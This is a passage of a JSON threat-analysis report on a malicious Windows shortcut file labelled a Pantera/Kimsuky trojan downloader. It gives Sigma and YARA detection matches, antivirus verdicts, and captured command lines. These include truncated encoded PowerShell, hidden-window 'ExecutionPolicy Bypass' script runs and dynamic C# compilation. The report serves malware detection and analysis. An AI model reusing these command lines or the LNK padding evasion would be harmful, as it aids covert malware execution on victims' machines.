"rule_author": "Liran Ravich",
"match_context": [
{
"values": {
"CommandLine": "%WINDIR%\\system32\\svchost.exe",
"Image": "C:\\Windows\\system32\\svchost.exe",
"EventID": "1"
}
}
]
},
{
"rule_level": "high",
"rule_id": "fe226328e3589518f77bd1ce4b456e119e55dde2c461f9c95e33b4e2a9f4373d",
"rule_source": "Sigma Integrated Rule Set (GitHub)",
"rule_title": "Suspicious LNK Command-Line Padding with Whitespace Characters",
"rule_description": "Detects exploitation of LNK file command-line length discrepancy, where attackers hide malicious commands beyond the 260-character UI limit while the actual command-line argument field supports 4096 characters using whitespace padding (e.g., 0x20, 0x09-0x0D).\nAdversaries insert non-printable whitespace characters (e.g., Line Feed \\x0A, Carriage Return \\x0D) to pad the visible section of the LNK file, pushing malicious commands past the UI-visible boundary.\nThe hidden payload, executed at runtime but invisible in Windows Explorer properties, enables stealthy execution and evasion\u2014commonly used for social engineering attacks.\nThis rule flags suspicious use of such padding observed in real-world attacks.\n",
"rule_author": "Swachchhanda Shrawan Poudel (Nextron Systems)",
"match_context": [
{
"values": {
"Product": "Microsoft\\xae Windows\\xae Operating System",
"CurrentDirectory": "C:\\Users\\Bruno\\Desktop\\",
"OriginalFileName": "PowerShell.EXE",
"Hashes": "SHA1=A72C41316307889E43FE8605A0DCA4A72E72A011,MD5=DCAADF7C9610B5EBEBDEDB1569EC4A9D,SHA256=D783BA6567FAF10FDFF2D0EA3864F6756862D6C733C7F4467283DA81AEDC3A80,IMPHASH=E09C4F82A1DA13A09F4FF2E625FEBA20",
"Description": "Windows PowerShell",
"FileVersion": "10.0.22621.2361 (WinBuild.160101.0800)",
"ParentCommandLine": "C:\\Windows\\Explorer.EXE",
"CommandLine": "\"C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"$VIUSBvejbawf = \\\"165 83 24 20 105 152 134 90 99 35 96 125 116 92 97 172 105 50 122 92 93 85 103 36 95 132 134 162 121 107 29 [TRUNCATED]",
"EventID": "1",
"ParentImage": "C:\\Windows\\explorer.exe",
"IntegrityLevel": "High",
"Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
"Company": "Microsoft Corporation"
}
},
{
"values": {
"Hashes": "MD5=04029E121A0CFA5991749937DD22A1D9,SHA256=9F914D42706FE215501044ACD85A32D58AAEF1419D404FDDFA5D3B48F66CCD9F,IMPHASH=7C955A0ABC747F57CCC4324480737EF7",
"CurrentDirectory": "C:\\Users\\Bruno\\Desktop\\",
"OriginalFileName": "PowerShell.EXE",
"Product": "Microsoft\\xae Windows\\xae Operating System",
"Description": "Windows PowerShell",
"EventID": "1",
"ParentCommandLine": "\"C:\\Windows\\sysnative\\WindowsPowerShell\\v1.0\\powershell.exe\" Start-Process -FilePath \"C:\\Users\\Bruno\\Desktop\\favorite.lnk\"",
"CommandLine": "\"C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"$VIUSBvejbawf = \\\"165 83 24 20 105 152 134 90 99 35 96 125 116 92 97 172 105 50 122 92 93 85 103 36 95 132 134 162 121 107 29 [TRUNCATED]",
"FileVersion": "10.0.19041.546 (WinBuild.160101.0800)",
"ParentImage": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
"IntegrityLevel": "High",
"Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
"Company": "Microsoft Corporation"
}
}
]
},
{
"rule_level": "medium",
"rule_id": "06b48fa7870d38bdf92b4d4a9b9c4a4df779bd405fdc5ba0e70911df20027ce1",
"rule_source": "Sigma Integrated Rule Set (GitHub)",
"rule_title": "Change PowerShell Policies to an Insecure Level",
"rule_description": "Detects changing the PowerShell script execution policy to a potentially insecure level using the \"-ExecutionPolicy\" flag.",
"rule_author": "frack113",
"match_context": [
{
"values": {
"Hashes": "SHA1=A72C41316307889E43FE8605A0DCA4A72E72A011,MD5=DCAADF7C9610B5EBEBDEDB1569EC4A9D,SHA256=D783BA6567FAF10FDFF2D0EA3864F6756862D6C733C7F4467283DA81AEDC3A80,IMPHASH=E09C4F82A1DA13A09F4FF2E625FEBA20",
"CurrentDirectory": "C:\\Users\\Bruno\\Desktop\\",
"OriginalFileName": "PowerShell.EXE",
"Product": "Microsoft\\xae Windows\\xae Operating System",
"Description": "Windows PowerShell",
"EventID": "1",
"ParentCommandLine": "C:\\Windows\\Explorer.EXE",
"CommandLine": "\"C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"$VIUSBvejbawf = \\\"165 83 24 20 105 152 134 90 99 35 96 125 116 92 97 172 105 50 122 92 93 85 103 36 95 132 134 162 121 107 29 [TRUNCATED]",
"FileVersion": "10.0.22621.2361 (WinBuild.160101.0800)",
"ParentImage": "C:\\Windows\\explorer.exe",
"IntegrityLevel": "High",
"Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
"Company": "Microsoft Corporation"
}
},
{
"values": {
"Product": "Microsoft\\xae Windows\\xae Operating System",
"CurrentDirectory": "C:\\Users\\Bruno\\Desktop\\",
"OriginalFileName": "PowerShell.EXE",
"Hashes": "MD5=04029E121A0CFA5991749937DD22A1D9,SHA256=9F914D42706FE215501044ACD85A32D58AAEF1419D404FDDFA5D3B48F66CCD9F,IMPHASH=7C955A0ABC747F57CCC4324480737EF7",
"Description": "Windows PowerShell",
"FileVersion": "10.0.19041.546 (WinBuild.160101.0800)",
"ParentCommandLine": "\"C:\\Windows\\sysnative\\WindowsPowerShell\\v1.0\\powershell.exe\" Start-Process -FilePath \"C:\\Users\\Bruno\\Desktop\\favorite.lnk\"",
"CommandLine": "\"C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"$VIUSBvejbawf = \\\"165 83 24 20 105 152 134 90 99 35 96 125 116 92 97 172 105 50 122 92 93 85 103 36 95 132 134 162 121 107 29 [TRUNCATED]",
"EventID": "1",
"ParentImage": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
"IntegrityLevel": "High",
"Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
"Company": "Microsoft Corporation"
}
},
{
"values": {
"Hashes": "MD5=04029E121A0CFA5991749937DD22A1D9,SHA256=9F914D42706FE215501044ACD85A32D58AAEF1419D404FDDFA5D3B48F66CCD9F,IMPHASH=7C955A0ABC747F57CCC4324480737EF7",
"CurrentDirectory": "C:\\Users\\Bruno\\Desktop\\",
"OriginalFileName": "PowerShell.EXE",
"Product": "Microsoft\\xae Windows\\xae Operating System",
"Description": "Windows PowerShell",
"FileVersion": "10.0.19041.546 (WinBuild.160101.0800)",
"ParentCommandLine": "\"C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"$VIUSBvejbawf = \\\"165 83 24 20 105 152 134 90 99 35 96 125 116 92 97 172 105 50 122 92 93 85 103 36 95 132 134 162 121 107 29 [TRUNCATED]",
"CommandLine": "\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -windowstyle hidden -ExecutionPolicy Bypass C:\\Users\\Bruno\\AppData\\Roaming\\firefox.ps1",
"EventID": "1",
"ParentImage": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
"IntegrityLevel": "High",
"Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
"Company": "Microsoft Corporation"
}
},
{
"values": {
"Product": "Microsoft\\xae Windows\\xae Operating System",
"CurrentDirectory": "C:\\Users\\Bruno\\Desktop\\",
"OriginalFileName": "PowerShell.EXE",
"Hashes": "MD5=04029E121A0CFA5991749937DD22A1D9,SHA256=9F914D42706FE215501044ACD85A32D58AAEF1419D404FDDFA5D3B48F66CCD9F,IMPHASH=7C955A0ABC747F57CCC4324480737EF7",
"Description": "Windows PowerShell",
"FileVersion": "10.0.19041.546 (WinBuild.160101.0800)",
"ParentCommandLine": "\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -windowstyle hidden -ExecutionPolicy Bypass C:\\Users\\Bruno\\AppData\\Roaming\\firefox.ps1",
"CommandLine": "\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoProfile -ExecutionPolicy Bypass -File C:\\Users\\Bruno\\AppData\\Roaming\\news.ps1 ",
"EventID": "1",
"ParentImage": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
"IntegrityLevel": "High",
"Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
"Company": "Microsoft Corporation"
}
},
{
"values": {
"CommandLine": "C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\powershell.exe $VIUSBvejbawf = \\165 83 24 20 105 152 134 90 99 35 96 125 116 92 97 172 105 50 122 92 93 85 103 36 95 132 134 162 121 107 29 37 112 155 150 130 103 29 57 104 104 96 121 107 29 37 165 172 167 169 170 236 157 25 236 74 61 236 151 176 173 236 50 57 234 184 176 236 79 68 234 28 156 236 73 57 162 89 104 43 107 146 177 105 85 88 29 25 173 152 176 167 100 29 25 171 170 174 89 89 87 94 171 170 174 154 101 40 107 162 179 92 93 170 102 107 108 115 [TRUNCATED]",
"Image": "C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\powershell.exe",
"EventID": "1"
}
}
]
},
{
"rule_level": "medium",
"rule_id": "5e2ea8c055dd73ea66238735323d0318c2a6c114047137146357b85f764b1101",
"rule_source": "Sigma Integrated Rule Set (GitHub)",
"rule_title": "Suspicious PowerShell WindowStyle Option",
"rule_description": "Adversaries may use hidden windows to conceal malicious activity from the plain sight of users.\nIn some cases, windows that would typically be displayed when an application carries out an operation can be hidden\n",
"rule_author": "frack113, Tim Shelton (fp AWS)",
"match_context": [
{
"values": {
"ScriptBlockText": "44 181 174 104 98 34 43 106 116 100 93 158 29 21 89 179 149 165 104 26 33 97 105 100 152 172 84 109 171 177 105 85 88 29 25 158 116 96 96 157 27 89 158 101 94 90 98 44 42 89 98 161 165 164 54 24 91 108 115 143 146 76 26 106 116 96 100 136 48 25 108 130 92 87 99 35 38 165 177 96 87 93 39 40 106 97 135 101 163 104 94 91 112 96 90 89 40 25 94 99 87 154 102 40 33 104 98 161 165 164 54 24 91 108 115 143 146 76 26 106 116 96 100 136 48 25 108 130 92 87 99 35 38 165 177 106 89 92 33 100 164 166 94 104 [TRUNCATED]",
"Path": "",
"ScriptBlockId": "5270ac1b-a402-4e29-ba1a-084344b94a5b",
"MessageTotal": "2",
"MessageNumber": "2",
"EventID": "4104"
}
},
{
"values": {
"ScriptBlockText": "44 109 160 128 93 100 138 48 26 100 114 128 104 90 30 36 95 110 149 118 88 48 27 89 168 128 87 93 46 40 90 98 176 89 93 26 40 91 98 104 100 96 37 109 160 148 94 98 87 36 40 95 97 132 96 89 29 109 171 168 130 90 124 31 30 103 108 100 100 172 100 72 85 112 109 84 88 40 30 95 133 97 93 99 46 20 173 147 87 89 107 30 26 173 168 138 96 96 44 109 169 112 107 100 170 113 96 118 108 98 101 93 26 58 89 92 100 100 172 73 36 105 113 107 91 145 113 109 123 112 99 90 86 44 96 132 97 107 92 172 100 61 108 97 1 [TRUNCATED]",
"MessageTotal": "2",
"ScriptBlockId": "24b4d14e-f544-4227-854e-2ed763e30605",
"Path": "",
"MessageNumber": "2",
"EventID": "4104"
}
}
]
},
{
"rule_level": "medium",
"rule_id": "b39586c79bf4d0d43c937efa6129ebb6f0b2cf03b7038a3a8234f84c147600f7",
"rule_source": "Sigma Integrated Rule Set (GitHub)",
"rule_title": "Dynamic .NET Compilation Via Csc.EXE",
"rule_description": "Detects execution of \"csc.exe\" to compile .NET code. Attackers often leverage this to compile code on the fly and use it in other stages.",
"rule_author": "Florian Roth (Nextron Systems), X__Junior (Nextron Systems)",
"match_context": [
{
"values": {
"Hashes": "MD5=F65B029562077B648A6A5F6A1AA76A66,SHA256=4A6D0864E19C0368A47217C129B075DDDF61A6A262388F9D21045D82F3423ED7,IMPHASH=EE1E569AD02AA1F7AECA80AC0601D80D",
"CurrentDirectory": "C:\\Users\\Bruno\\Desktop\\",
"OriginalFileName": "csc.exe",
"Product": "Microsoft\\xae .NET Framework",
"Description": "Visual C# Command Line Compiler",
"EventID": "1",
"ParentCommandLine": "\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -windowstyle hidden -ExecutionPolicy Bypass C:\\Users\\Bruno\\AppData\\Roaming\\firefox.ps1",
"CommandLine": "\"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe\" /noconfig /fullpaths @\"C:\\Users\\Bruno\\AppData\\Local\\Temp\\flwg3nkw\\flwg3nkw.cmdline\"",
"FileVersion": "4.8.4084.0 built by: NET48REL1",
"ParentImage": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
"IntegrityLevel": "High",
"Image": "C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe",
"Company": "Microsoft Corporation"
}
},
{
"values": {
"CommandLine": "C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe /noconfig /fullpaths @C:\\Users\\<USER>\\AppData\\Local\\Temp\\i3ogpj35\\i3ogpj35.cmdline",
"Image": "C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe",
"EventID": "1"
}
}
]
},
{
"rule_level": "low",
"rule_id": "1c2e4db94ca79f939e94e29c04fb3b71467fc6f5b9c31db34fcce5a2fb3b856f",
"rule_source": "Sigma Integrated Rule Set (GitHub)",
"rule_title": "Non Interactive PowerShell Process Spawned",
"rule_description": "Detects non-interactive PowerShell activity by looking at the \"powershell\" process with a non-user GUI process such as \"explorer.exe\" as a parent.",
"rule_author": "Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements)",
"match_context": [
{
"values": {
"Hashes": "MD5=04029E121A0CFA5991749937DD22A1D9,SHA256=9F914D42706FE215501044ACD85A32D58AAEF1419D404FDDFA5D3B48F66CCD9F,IMPHASH=7C955A0ABC747F57CCC4324480737EF7",
"CurrentDirectory": "C:\\Users\\Bruno\\Desktop\\",
"OriginalFileName": "PowerShell.EXE",
"Product": "Microsoft\\xae Windows\\xae Operating System",
"Description": "Windows PowerShell",
"FileVersion": "10.0.19041.546 (WinBuild.160101.0800)",
"ParentCommandLine": "\"C:\\Windows\\sysnative\\WindowsPowerShell\\v1.0\\powershell.exe\" Start-Process -FilePath \"C:\\Users\\Bruno\\Desktop\\favorite.lnk\"",
"CommandLine": "\"C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"$VIUSBvejbawf = \\\"165 83 24 20 105 152 134 90 99 35 96 125 116 92 97 172 105 50 122 92 93 85 103 36 95 132 134 162 121 107 29 [TRUNCATED]",
"EventID": "1",
"ParentImage": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
"IntegrityLevel": "High",
"Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
"Company": "Microsoft Corporation"
}
},
{
"values": {
"Product": "Microsoft\\xae Windows\\xae Operating System",
"CurrentDirectory": "C:\\Users\\Bruno\\Desktop\\",
"OriginalFileName": "PowerShell.EXE",
"Hashes": "MD5=04029E121A0CFA5991749937DD22A1D9,SHA256=9F914D42706FE215501044ACD85A32D58AAEF1419D404FDDFA5D3B48F66CCD9F,IMPHASH=7C955A0ABC747F57CCC4324480737EF7",
"Description": "Windows PowerShell",
"FileVersion": "10.0.19041.546 (WinBuild.160101.0800)",
"ParentCommandLine": "\"C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"$VIUSBvejbawf = \\\"165 83 24 20 105 152 134 90 99 35 96 125 116 92 97 172 105 50 122 92 93 85 103 36 95 132 134 162 121 107 29 [TRUNCATED]",
"CommandLine": "\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -windowstyle hidden -ExecutionPolicy Bypass C:\\Users\\Bruno\\AppData\\Roaming\\firefox.ps1",
"EventID": "1",
"ParentImage": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
"IntegrityLevel": "High",
"Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
"Company": "Microsoft Corporation"
}
},
{
"values": {
"Product": "Microsoft\\xae Windows\\xae Operating System",
"CurrentDirectory": "C:\\Users\\Bruno\\Desktop\\",
"OriginalFileName": "PowerShell.EXE",
"Hashes": "MD5=04029E121A0CFA5991749937DD22A1D9,SHA256=9F914D42706FE215501044ACD85A32D58AAEF1419D404FDDFA5D3B48F66CCD9F,IMPHASH=7C955A0ABC747F57CCC4324480737EF7",
"Description": "Windows PowerShell",
"FileVersion": "10.0.19041.546 (WinBuild.160101.0800)",
"ParentCommandLine": "\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -windowstyle hidden -ExecutionPolicy Bypass C:\\Users\\Bruno\\AppData\\Roaming\\firefox.ps1",
"CommandLine": "\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoProfile -ExecutionPolicy Bypass -File C:\\Users\\Bruno\\AppData\\Roaming\\news.ps1 ",
"EventID": "1",
"ParentImage": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
"IntegrityLevel": "High",
"Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
"Company": "Microsoft Corporation"
}
},
{
"values": {
"CommandLine": "C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\powershell.exe $VIUSBvejbawf = \\165 83 24 20 105 152 134 90 99 35 96 125 116 92 97 172 105 50 122 92 93 85 103 36 95 132 134 162 121 107 29 37 112 155 150 130 103 29 57 104 104 96 121 107 29 37 165 172 167 169 170 236 157 25 236 74 61 236 151 176 173 236 50 57 234 184 176 236 79 68 234 28 156 236 73 57 162 89 104 43 107 146 177 105 85 88 29 25 173 152 176 167 100 29 25 171 170 174 89 89 87 94 171 170 174 154 101 40 107 162 179 92 93 170 102 107 108 115 [TRUNCATED]",
"Image": "C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\powershell.exe",
"EventID": "1"
}
},
{
"values": {
"CommandLine": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe -windowstyle hidden -ExecutionPolicy Bypass C:\\Users\\<USER>\\AppData\\Roaming\\firefox.ps1",
"Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
"EventID": "1"
}
}
]
},
{
"rule_level": "low",
"rule_id": "764276dba9654bf07d000fa390ae98de360ac172927cf3ef64f2db6c5b9be3b2",
"rule_source": "Sigma Integrated Rule Set (GitHub)",
"rule_title": "Dynamic CSharp Compile Artefact",
"rule_description": "When C# is compiled dynamically, a .cmdline file will be created as a part of the process.\nCertain processes are not typically observed compiling C# code, but can do so without touching disk.\nThis can be used to unpack a payload for execution\n",
"rule_author": "frack113",
"match_context": [
{
"values": {
"Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
"EventID": "11",
"TargetFilename": "C:\\Users\\Bruno\\AppData\\Local\\Temp\\flwg3nkw\\flwg3nkw.cmdline"
}
},
{
"values": {
"TargetFilename": "C:\\Users\\<USER>\\AppData\\Local\\Temp\\i3ogpj35\\i3ogpj35.cmdline"
}
},
{
"values": {
"TargetFilename": "%TEMP%\\cbi3m5ep.cmdline"
}
}
]
},
{
"rule_level": "low",
"rule_id": "7cf0b126730658e7c96da1ae0b63c1bb84154a239ca32c09909963038dfdcacf",
"rule_source": "Sigma Integrated Rule Set (GitHub)",
"rule_title": "PowerShell Script Dropped Via PowerShell.EXE",
"rule_description": "Detects PowerShell creating a PowerShell file (.ps1). While often times this behavior is benign, sometimes it can be a sign of a dropper script trying to achieve persistence.",
"rule_author": "frack113",
"match_context": [
{
"values": {
"Image": "C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\powershell.exe",
"TargetFilename": "C:\\Users\\Bruno\\AppData\\Roaming\\firefox.ps1",
"EventID": "11"
}
},
{
"values": {
"Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
"EventID": "11",
"TargetFilename": "C:\\Users\\Bruno\\AppData\\Roaming\\Microsoft\\Windows\\CloudStore\\facebook.ps1"
}
},
{
"values": {
"Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
"TargetFilename": "C:\\Users\\Bruno\\AppData\\Roaming\\news.ps1",
"EventID": "11"
}
}
]
}
],
"popular_threat_classification": {
"suggested_threat_label": "trojan.pantera/winlnk",
"popular_threat_name": [
{
"count": 8,
"value": "pantera"
},
{
"count": 3,
"value": "winlnk"
},
{
"count": 2,
"value": "lnkexec"
}
],
"popular_threat_category": [
{
"count": 19,
"value": "trojan"
},
{
"count": 2,
"value": "downloader"
}
]
},
"sigma_analysis_summary": {
"Joe Security Rule Set (GitHub)": {
"critical": 0,
"high": 1,
"medium": 0,
"low": 0
},
"Sigma Integrated Rule Set (GitHub)": {
"critical": 0,
"high": 3,
"medium": 3,
"low": 3
}
},
"last_analysis_date": 1776239516,
"crowdsourced_yara_results": [
{
"ruleset_id": "002bb473a9",
"ruleset_version": "002bb473a9|d1fd450ec7c73f71e829d8f39a46e82e73687778",
"ruleset_name": "LNK_Ruleset",
"rule_name": "PS_in_LNK",
"match_date": 1776239919,
"description": "Identifies PowerShell artefacts in shortcut (LNK) files.",
"author": "@bartblaze",
"source": "https://github.com/bartblaze/Yara-rules"
},
{
"ruleset_id": "002bb473a9",
"ruleset_version": "002bb473a9|d1fd450ec7c73f71e829d8f39a46e82e73687778",
"ruleset_name": "LNK_Ruleset",
"rule_name": "Large_filesize_LNK",
"match_date": 1776239919,
"description": "Identifies shortcut (LNK) file larger than 100KB. Most goodware LNK files are smaller than 100KB.",
"author": "@bartblaze",
"source": "https://github.com/bartblaze/Yara-rules"
},
{
"ruleset_id": "000a2489bd",
"ruleset_version": "000a2489bd|48401e01afaf50f369a7c99eab393389320c7380",
"ruleset_name": "expl_lnk_zdi_can_25373",
"rule_name": "EXT_EXPL_ZTH_LNK_EXPLOIT_A",
"match_date": 1776239919,
"description": "This YARA file detects padded LNK files designed to exploit ZDI-CAN-25373.",
"author": "Peter Girnus",
"source": "https://github.com/Neo23x0/signature-base"
},
{
"ruleset_id": "000bd045c7",
"ruleset_version": "000bd045c7|1d926845269a3ac8de0431da133950390b5cced3",
"ruleset_name": "gen_susp_lnk",
"rule_name": "SUSP_LNK_Big_Link_File",
"match_date": 1776239919,
"description": "Detects a suspiciously big LNK file - maybe with embedded content",
"author": "Florian Roth (Nextron Systems)",
"source": "https://github.com/Neo23x0/signature-base"
}
],
"unique_sources": 1,
"last_submission_date": 1774511702,
"last_analysis_results": {
"Bkav": {
"method": "blacklist",
"engine_name": "Bkav",
"engine_version": "2.0.0.1",
"engine_update": "20260414",
"category": "malicious",
"result": "LNK.ScriptQH.Trojan"
},
"Lionic": {
"method": "blacklist",
"engine_name": "Lionic",
"engine_version": "8.16",
"engine_update": "20260415",
"category": "malicious",
"result": "Trojan.WinLNK.Pantera.4!c"
},
"Cynet": {
"method": "blacklist",
"engine_name": "Cynet",
"engine_version": "4.0.3.4",
"engine_update": "20260414",
"category": "malicious",
"result": "Malicious (score: 99)"
},
"CTX": {
"method": "blacklist",
"engine_name": "CTX",
"engine_version": "2024.8.29.1",
"engine_update": "20260415",
"category": "malicious",
"result": "lnk.trojan.pantera"
},
"CAT-QuickHeal": {
"method": "blacklist",
"engine_name": "CAT-QuickHeal",
"engine_version": "22.00",
"engine_update": "20260414",
"category": "malicious",
"result": "cld.lnk.trojan.1776162756"
},
"Skyhigh": {
"method": "blacklist",
"engine_name": "Skyhigh",
"engine_version": "v2021.2.0+4045",
"engine_update": "20260414",
"category": "malicious",
"result": "BehavesLike.Trojan.dl"
},
"ALYac": {
"method": "blacklist",
"engine_name": "ALYac",
"engine_version": "2.0.0.10",
"engine_update": "20260415",
"category": "malicious",
"result": "Trojan.Agent.LNK.Gen"
},
"Malwarebytes": {
"method": "blacklist",
"engine_name": "Malwarebytes",
"engine_version": "3.1.0.214",
"engine_update": "20260415",
"category": "undetected",
"result": null
},
"Sangfor": {
"method": "blacklist",
"engine_name": "Sangfor",
"engine_version": "2.22.3.0",
"engine_update": "20260413",
"category": "undetected",
"result": null
},
"K7AntiVirus": {
"method": "blacklist",
"engine_name": "K7AntiVirus",
"engine_version": "14.47.59201",
"engine_update": "20260415",
"category": "malicious",
"result": "Trojan ( 0060e1851 )"
},
"K7GW": {
"method": "blacklist",
"engine_name": "K7GW",
"engine_version": "14.47.59201",
"engine_update": "20260415",
"category": "malicious",
"result": "Trojan ( 0060e1851 )"
},
"CrowdStrike": {
"method": "blacklist",
"engine_name": "CrowdStrike",
"engine_version": "1.0",
"engine_update": "20251219",
"category": "undetected",
"result": null
},
"Arcabit": {
"method": "blacklist",
"engine_name": "Arcabit",
"engine_version": "2025.0.0.23",
"engine_update": "20260415",
"category": "malicious",
"result": "CMD:Heur.BZC.YAX.Pantera.229.092F4C5B"
},
"Baidu": {
"method": "blacklist",
"engine_name": "Baidu",
"engine_version": "1.0.0.2",
"engine_update": "20190318",
"category": "undetected",
"result": null
},
"VirIT": {
"method": "blacklist",
"engine_name": "VirIT",
"engine_version": "9.5.1186",
"engine_update": "20260414",
"category": "undetected",
"result": null
},
"Symantec": {
"method": "blacklist",
"engine_name": "Symantec",
"engine_version": "1.22.0.0",
"engine_update": "20260415",
"category": "malicious",
"result": "CL.Downloader!gen211"
},
"ESET-NOD32": {
"method": "blacklist",
"engine_name": "ESET-NOD32",
"engine_version": "18.2.18.0",
"engine_update": "20260415",
"category": "malicious",
"result": "LNK/Kimsuky.AA trojan"
},
"TrendMicro-HouseCall": {
"method": "blacklist",
"engine_name": "TrendMicro-HouseCall",
"engine_version": "24.550.0.1002",
"engine_update": "20260415",
"category": "malicious",
"result": "HEUR_LNKEXEC.A"
},
"ClamAV": {
"method": "blacklist",
"engine_name": "ClamAV",
"engine_version": "1.5.2.0",
"engine_update": "20260414",
"category": "undetected",
"result": null
},
"Kaspersky": {
"method": "blacklist",
"engine_name": "Kaspersky",
"engine_version": "22.0.1.28",
"engine_update": "20260415",
"category": "malicious",
"result": "HEUR:Trojan.WinLNK.Agent.gen"
},
"BitDefender": {
"method": "blacklist",
"engine_name": "BitDefender",
"engine_version": "7.2",
"engine_update": "20260415",
"category": "malicious",
"result": "CMD:Heur.BZC.YAX.Pantera.229.092F4C5B"
},
"NANO-Antivirus": {
"method": "blacklist",
"engine_name": "NANO-Antivirus",
"engine_version": "1.0.170.26895",
"engine_update": "20260415",
"category": "undetected",
"result": null
},
"SUPERAntiSpyware": {
"method": "blacklist",
"engine_name": "SUPERAntiSpyware",
"engine_version": "5.6.0.1032",
"engine_update": "20260414",
"category": "undetected",
"result": null
},
"MicroWorld-eScan": {
"method": "blacklist",
"engine_name": "MicroWorld-eScan",
"engine_version": "14.0.409.0",
"engine_update": "20260415",
"category": "malicious",
"result": "CMD:Heur.BZC.YAX.Pantera.229.092F4C5B"
},
"Rising": {
"method": "blacklist",
"engine_name": "Rising",
"engine_version": "25.0.0.28",
"engine_update": "20260415",
"category": "malicious",
"result": "Trojan.PSRunner/LNK!1.BADE (CLASSIC)"
},
"Sophos": {
"method": "blacklist",
"engine_name": "Sophos",
"engine_version": "3.4.1.0",
"engine_update": "20260415",
"category": "malicious",
"result": "Mal/LnkObf-A"
},
"F-Secure": {
"method": "blacklist",
"engine_name": "F-Secure",
"engine_version": "18.10.1547.307",
"engine_update": "20260414",
"category": "undetected",
"result": null
},
"DrWeb": {
"method": "blacklist",
"engine_name": "DrWeb",
"engine_version": "7.0.75.2070",
"engine_update": "20260415",
"category": "undetected",
"result": null
},
"VIPRE": {
"method": "blacklist",
"engine_name": "VIPRE",
"engine_version": "6.0.0.35",
"engine_update": "20260414",
"category": "malicious",
"result": "CMD:Heur.BZC.YAX.Pantera.229.092F4C5B"
},
"TrendMicro": {
"method": "blacklist",
"engine_name": "TrendMicro",
"engine_version": "24.550.0.1002",
"engine_update": "20260415",
"category": "malicious",
"result": "HEUR_LNKEXEC.A"
},
"McAfeeD": {
"method": "blacklist",
"engine_name": "McAfeeD",
"engine_version": "1.2.0.14392",
"engine_update": "20260415",
"category": "malicious",
"result": "Trojan:Shortcut/SuspiciousLNK.SPCS!1"
},
"SentinelOne": {
"method": "blacklist",
"engine_name": "SentinelOne",
"engine_version": "7.6.2.19",
"engine_update": "20260324",
"category": "undetected",
"result": null
},
"CMC": {
"method": "blacklist",
"engine_name": "CMC",
"engine_version": "2.4.2022.1",
"engine_update": "20260415",
"category": "undetected",
"result": null
},
"Emsisoft": {
"method": "blacklist",
"engine_name": "Emsisoft",
"engine_version": "2024.8.0.61147",
"engine_update": "20260415",
"category": "malicious",
"result": "CMD:Heur.BZC.YAX.Pantera.229.092F4C5B (B)"
},
"Ikarus": {
"method": "blacklist",
"engine_name": "Ikarus",
"engine_version": "6.4.16.0",
"engine_update": "20260414",
"category": "malicious",
"result": "Trojan-Downloader.PS.Agent"
},
"Jiangmin": {
"method": "blacklist",
"engine_name": "Jiangmin",
"engine_version": "16.0.100",
"engine_update": "20260415",
"category": "undetected",
"result": null
},
"Google": {
"method": "blacklist",
"engine_name": "Google",
"engine_version": "1776229265",
"engine_update": "20260415",
"category": "malicious",
"result": "Detected"
},
"Avira": {
"method": "blacklist",
"engine_name": "Avira",
"engine_version": "8.3.3.24",
"engine_update": "20260414",
"category": "undetected",
"result": null
},
"Antiy-AVL": {
"method": "blacklist",
"engine_name": "Antiy-AVL",
"engine_version": "3.0",
"engine_update": "20260415",
"category": "undetected",
"result": null
},
"Kingsoft": {
